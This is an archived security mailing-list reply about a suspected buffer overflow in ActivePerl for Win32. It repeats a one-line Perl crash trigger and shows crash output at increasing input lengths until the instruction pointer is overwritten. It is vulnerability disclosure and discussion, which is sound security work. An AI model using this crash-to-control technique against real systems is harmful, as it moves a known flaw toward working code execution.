lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <40AAB885.10935.31071242@localhost>
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: Re: Buffer Overflow in ActivePerl ?

"Oliver@...yhat.de" <Oliver@...yhat.de> wrote:

> i played around with ActiveState's ActivePerl for Win32, and crashed 
> Perl.exe with the following command:
> 
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865.  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141.  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141.  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this??  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc processors...)


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ